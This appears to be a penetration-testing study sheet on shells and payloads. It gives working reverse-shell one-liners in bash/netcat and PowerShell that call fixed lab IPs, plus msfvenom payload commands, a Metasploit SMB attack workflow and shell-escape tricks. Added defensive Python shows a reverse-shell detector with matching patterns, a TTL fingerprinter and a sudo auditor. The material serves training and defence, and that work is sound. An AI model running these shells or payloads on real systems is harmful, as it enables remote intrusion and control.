# Shells & Payloads: Payloads Overview

## Payloads Overview

### Types of Payloads

* **Staged Payloads**
  * Sends initial stage first, then downloads main payload
  * Better for environments with sufficient memory
  * Example naming: `windows/meterpreter/reverse_tcp`
* **Stageless Payloads**
  * Entire payload sent at once
  * Ideal for low-bandwidth environments
  * Example naming: `windows/meterpreter_reverse_tcp`
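The naming rule above is the only signal the notes give for telling the two apart, so here it is as an added example (not code from the original notes or from Metasploit): a classifier that reads an msfvenom payload path and reports whether it is staged, stageless, or a self-contained single. The `STAGES` tuple is an assumption listing stage names that appear in common payload paths; extend it for payloads you meet.

```python
# Added example, not from the original notes: tell a staged payload from a
# stageless one by its msfvenom/Metasploit path alone. The rule is the
# separator: "meterpreter/reverse_tcp" (stage and stager as separate path
# segments) is staged, "meterpreter_reverse_tcp" (joined by an underscore)
# is stageless. STAGES is an assumption listing stage names seen in common
# payload paths; extend it for payloads you encounter.

STAGES = ("meterpreter", "shell", "vncinject", "dllinject", "powershell")
STAGER_PREFIXES = ("reverse_", "bind_")


def classify_payload(name: str) -> str:
    """Return 'staged', 'stageless' or 'single' for a payload path."""
    parts = name.strip().lower().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload path: {name!r}")
    last = parts[-1]
    # Staged: a bare stager segment directly after a stage segment.
    if last.startswith(STAGER_PREFIXES) and parts[-2] in STAGES:
        return "staged"
    # Stageless: stage and stager fused into one segment.
    if any(last.startswith(f"{stage}_{prefix}")
           for stage in STAGES for prefix in STAGER_PREFIXES):
        return "stageless"
    # No recognised stage/stager pair (exec, messagebox, cmd/unix/reverse_bash, ...):
    # self-contained "single" payloads in Metasploit's own terminology.
    return "single"


def group_payloads(names):
    """Bucket payload paths (e.g. lines from `msfvenom -l payloads`) by type."""
    groups = {"staged": [], "stageless": [], "single": []}
    for name in names:
        groups[classify_payload(name)].append(name)
    return groups


if __name__ == "__main__":
    for path in ("windows/meterpreter/reverse_tcp", "windows/meterpreter_reverse_tcp",
                 "linux/x64/shell_reverse_tcp", "windows/x64/exec"):
        print(f"{path:40} {classify_payload(path)}")
```

The distinction matters on the wire as well as on disk: a staged payload produces a small first connection that then pulls the real stage, which is why the two types are listed separately in the notes.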

### Essential Payload Commands

#### Netcat/Bash Reverse Shell

```bash
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
```

#### PowerShell Reverse Shell

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"
```
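Both one-liners above leave a distinctive process command line, which is what a defender gets to see in auditd or Sysmon-style process-creation events. As an added example (not from the original notes), the following Python runs two multi-pattern rules over a constructed log: one for the `mkfifo`/`nc` Bash shell, one for the PowerShell `TCPClient` shell. The `<timestamp> <host> <command line>` log format and every line of `SAMPLE_LOG` are constructed for this example.

```python
import re
from dataclasses import dataclass

# Added example, not from the original notes: detection logic for the two
# reverse-shell one-liners above, run over process command lines. The log
# format ("<timestamp> <host> <command line>") and every line in SAMPLE_LOG
# are constructed for this example.

# Every pattern in a rule must match; a lone "nc" or "mkfifo" does not fire.
RULES = {
    "linux_fifo_nc_reverse_shell": [
        r"\bmkfifo\b",                               # named pipe feeding the shell
        r"\b(ba|z)?sh\b[^|;]*\s-i\b",               # an interactive shell in the pipeline
        r"\b(nc|ncat|netcat)\b\s+\S+\s+\d{1,5}\b",   # netcat to a host and port
    ],
    "powershell_tcpclient_reverse_shell": [
        r"System\.Net\.Sockets\.TCPClient",          # raw socket to a remote host
        r"\.GetStream\(\)",
        r"\b(iex|Invoke-Expression)\b",              # executes whatever the socket delivers
    ],
}

# Constructed sample: two benign lines, two reverse shells, one ordinary PowerShell.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z web01 /usr/sbin/sshd -D
2024-05-01T10:00:07Z web01 nc -zv 10.0.0.5 443
2024-05-01T10:00:09Z web01 rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
2024-05-01T10:01:12Z ws17 powershell -nop -c "Get-Service | Out-String"
2024-05-01T10:01:15Z ws17 powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){ iex $data }"
"""


@dataclass
class Finding:
    line_no: int
    host: str
    rule: str
    command: str


def match_rules(command: str) -> list:
    """Names of every rule whose patterns all match the command line."""
    return [name for name, patterns in RULES.items()
            if all(re.search(p, command, re.IGNORECASE) for p in patterns)]


def scan_log(text: str) -> list:
    """Scan '<timestamp> <host> <command line>' records and return findings."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        fields = line.split(maxsplit=2)
        if len(fields) < 3:
            continue
        _timestamp, host, command = fields
        for rule in match_rules(command):
            findings.append(Finding(line_no, host, rule, command))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} {f.host}: {f.rule}")
```

Requiring all patterns of a rule keeps the port-check `nc -zv ...` and a plain interactive `bash -i` from alerting; the netcat pattern alone or the shell pattern alone would be far too noisy in real process telemetry.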

### MSFvenom Payload Generation

* **List Available Payloads**

  ```bash
  msfvenom -l payloads
  ```
* **Linux Payload Creation**

  ```bash
  msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf
  ```
* **Windows Payload Creation**

  ```bash
  msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
  ```

## Windows System Infiltration

### Fingerprinting Windows Hosts

* **TTL Check via Ping**

  ```bash
  ping <target_ip>    # Look for TTL=128 or 32
  ```
* **Nmap OS Detection**

  ```bash
  sudo nmap -v -O <target_ip>
  sudo nmap -v -A <target_ip>    # Aggressive scan
  ```
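The TTL rule above is a first-pass guess, and the number you actually see is the initial TTL minus the hops the reply crossed. As an added example (not from the original notes), the following Python parses a ping transcript, picks the most frequent TTL, and maps it to an OS family plus an inferred hop count. The initial-TTL table is an assumption of common defaults (32 legacy Windows, 64 Linux/Unix/macOS, 128 modern Windows, 255 many network devices), and both ping transcripts are constructed.

```python
import re
from collections import Counter

# Added example, not from the original notes: make the "look for TTL=128 or 32"
# check repeatable and account for hops. INITIAL_TTLS is an assumption of
# common defaults; the ping transcripts below are constructed.

INITIAL_TTLS = {
    32: "Windows (legacy 9x/NT)",
    64: "Linux/Unix/macOS",
    128: "Windows",
    255: "network device / Solaris",
}
MAX_PLAUSIBLE_HOPS = 30

# Matches both Linux ("ttl=126") and Windows ("TTL=63") ping output.
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)

# Constructed transcripts: a Linux ping to a Windows host two hops away,
# and a Windows ping to a Linux host one hop away.
PING_TO_WINDOWS = """\
PING 10.10.10.5 (10.10.10.5) 56(84) bytes of data.
64 bytes from 10.10.10.5: icmp_seq=1 ttl=126 time=0.62 ms
64 bytes from 10.10.10.5: icmp_seq=2 ttl=126 time=0.58 ms
"""
PING_TO_LINUX = """\
Reply from 10.10.10.7: bytes=32 time=1ms TTL=63
Reply from 10.10.10.7: bytes=32 time=1ms TTL=63
"""


def guess_os_from_ttl(ttl: int):
    """Map an observed TTL to (os_family, hops) via the nearest initial TTL above it.

    Values near a boundary are ambiguous: a TTL of 32 could be a legacy
    Windows host next door or a Linux host 32 hops away; this function
    always returns the interpretation with the fewest hops.
    """
    for initial in sorted(INITIAL_TTLS):
        hops = initial - ttl
        if 0 <= hops <= MAX_PLAUSIBLE_HOPS:
            return INITIAL_TTLS[initial], hops
    return "unknown", None


def fingerprint_ping(output: str):
    """Use the most frequent TTL in a transcript; returns (os_family, hops, ttl)."""
    ttls = [int(t) for t in TTL_RE.findall(output)]
    if not ttls:
        return "unknown", None, None
    ttl, _count = Counter(ttls).most_common(1)[0]
    family, hops = guess_os_from_ttl(ttl)
    return family, hops, ttl


if __name__ == "__main__":
    print(fingerprint_ping(PING_TO_WINDOWS))
    print(fingerprint_ping(PING_TO_LINUX))
```

Treat the result as a hint to be confirmed with `nmap -O`: hosts behind load balancers or with a tuned `net.ipv4.ip_default_ttl` will not match the table.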

### Key Windows Ports

* **139, 445**: NetBIOS/SMB
* **135**: MSRPC
* **443**: HTTPS

### Common Windows Payloads

1. **DLLs**: For privilege escalation and UAC bypass
2. **Batch Files (.bat)**: Automation scripts
3. **VBScript (.vbs)**: Client-side automation
4. **MSI Files**: Installation packages
5. **PowerShell Scripts**: System automation and exploitation

### Metasploit Attack Workflow

```bash
# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit
```

## Linux System Infiltration

### Pre-Exploitation Checklist

* [ ] Identify Linux distribution
* [ ] Check available shells and programming languages
* [ ] Determine system role (web server, database, etc.)
* [ ] Look for application-specific vulnerabilities
* [ ] Search for known CVEs

### Interactive Shell Spawning Methods

* **Python TTY Shell**

  ```bash
  python -c 'import pty; pty.spawn("/bin/sh")'
  ```
* **Basic Shell Spawning**

  ```bash
  /bin/sh -i
  perl -e 'exec "/bin/sh";'
  ruby -e 'exec "/bin/sh";'
  lua -e 'os.execute("/bin/sh")'
  awk 'BEGIN {system("/bin/sh")}'
  ```
* **VIM Shell Escape**

  ```bash
  vim -c ':!/bin/sh'
  # Or in VIM:
  :set shell=/bin/sh
  :shell
  ```

### Permission Checks

```bash
# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l
```
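Reading `sudo -l` by eye is error-prone on a host with many rules, and the interpreters listed in the shell-spawning section above make any rule granting them equivalent to granting a shell. As an added example (not from the original notes), the following Python parses `sudo -l` output into rules and flags the ones an auditor or hardening review should look at: `ALL` commands, `NOPASSWD` tags, and binaries from the shell-spawning list. It assumes the rule lines use the `(runas) TAG: command, command` layout that `sudo -l` prints; the sample output is constructed.

```python
import os
import re
from dataclasses import dataclass, field

# Added example, not from the original notes: audit `sudo -l` output for
# rules that hand out more than they appear to. SHELL_CAPABLE lists the
# interpreters and editors the shell-spawning section shows escaping to
# a shell; the sample output below is constructed.

SHELL_CAPABLE = {"sh", "bash", "python", "python3", "perl", "ruby", "lua", "awk", "vim", "vi"}

# "(root) NOPASSWD: /usr/bin/vim" -> runas="root", tags="NOPASSWD: ", cmds="/usr/bin/vim"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/vim
    (ALL : ALL) ALL
    (root) /usr/sbin/service apache2 restart
"""


@dataclass
class SudoRule:
    runas: str
    tags: list
    command: str
    risks: list = field(default_factory=list)


def parse_sudo_l(text: str) -> list:
    """Return one SudoRule per command found after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in re.findall(r"[A-Z_]+:", m.group("tags"))]
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            rules.append(SudoRule(m.group("runas").strip(), tags, cmd))
    return rules


def assess(rule: SudoRule) -> list:
    """Fill in and return the risks for a single rule."""
    risks = []
    if rule.command == "ALL":
        risks.append("any command")
    if "NOPASSWD" in rule.tags:
        risks.append("no password required")
    # Only the binary counts: "/usr/bin/python3 /opt/app/backup.py" is still python3.
    binary = os.path.basename(rule.command.split()[0])
    if binary in SHELL_CAPABLE:
        risks.append(f"{binary} can spawn a shell")
    rule.risks = risks
    return risks


def audit(text: str) -> list:
    """Rules from `sudo -l` output that carry at least one risk."""
    return [r for r in parse_sudo_l(text) if assess(r)]


if __name__ == "__main__":
    for r in audit(SAMPLE_SUDO_L):
        print(f"({r.runas}) {r.command}: {', '.join(r.risks)}")
```

The `service apache2 restart` rule passes unflagged because its binary is not in the list, which is the intended outcome: narrowly scoped commands are what sudoers should contain.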

## Best Practices

### Pre-Exploitation

* Always perform thorough reconnaissance
* Document all findings and attempted exploits
* Verify target scope and permissions

### Post-Exploitation

* Maintain access securely
* Document all changes made to the system
* Clean up after testing is complete

### Security Considerations

* Use staged payloads for better reliability
* Consider antivirus evasion techniques
* Always use secure channels for communication
